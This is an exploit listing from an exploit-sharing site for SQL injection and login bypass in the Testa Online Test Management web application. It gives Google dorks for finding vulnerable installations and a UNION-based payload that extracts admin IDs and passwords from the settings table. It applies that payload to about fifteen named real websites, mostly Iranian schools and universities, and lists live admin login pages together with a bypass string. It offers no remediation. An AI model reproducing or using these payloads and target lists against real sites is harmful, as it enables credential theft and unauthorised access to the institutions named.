Testa Online Test Management SQL Injection Vulnerability

2013-11-17T00:00:00
ID 1337DAY-ID-21534
Type zdt
Reporter Ashiyane
Modified 2013-11-17T00:00:00

Description

Testa Online Test Management suffers from a remote SQL injection vulnerability that allows for login bypass. Note that this advisory has site-specific information.

                                        
                                            ################################################################
# Exploit Title : Testa Online Test Management Sql Injection / Login page Bypass
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://testa.cc/
#
# Software Link Download : http://download.aftab.cc/products/testa/Testa_wos_2.0.0.2.zip
#
# Google Dork : intitle:Testa Online Test Management System
#
# Google Dork 2 : inurl:"?test_id="
#
# Date: 2013/11/13
#
# Tested on: Windows 7 , Linux
############################################################
# Exploit : Sql Injection
#
# Location : [Target]/?test_id=[Sql Injection]
#
######################
# Demo Sql Injection 
#
# http://onlinetest.iauda.ac.ir/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ 
#
# http://dr-taghizadeh.ir/test/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
#
# http://learning.kashanu.ac.ir/azmoon/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
#
# http://edunabi.ir/testa//?test_id=-1%27+/*!50000union*/+/*!50000select*/+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
#
# http://behshahr-health.ir/azmoon//?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
#
# http://www.azmoon.biobase.ir/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
#
# http://www.herfehofankhoy.ir/azmoon/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
#
# 
# http://az1.orq.ir/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ 
#
#
#http://aliheydarian.ir/test/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
#
#
#http://azmoonarabi.gigfa.com//?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
#
# http://azmoonarabi.ir/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
#
# http://h-karimi.ir/testa//?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
#
# http://lightchat.ir//?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
#
# http://chahischool.vvs.ir/Tests/?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
#
#
#########################################
# Demo Login page Bypass
#########################################
username & password : '=' 'or'
#########################################
# http://dr-taghizadeh.ir/test/admin/index.php
#
#  http://online.tech-jey.ir/admin/index.php
#
# http://onlinetest.iauda.ac.ir/admin/index.php
#
# http://learning.kashanu.ac.ir/azmoon/admin/index.php
#
# http://edunabi.ir/testa/admin/index.php
#
# http://behshahr-health.ir/azmoon/admin/index.php 
#
# http://www.azmoon.biobase.ir/admin/ 
#
#http://www.herfehofankhoy.ir/azmoon/admin/
#
# http://az1.orq.ir/admin 
#
##################################

#  0day.today [2018-02-20]  #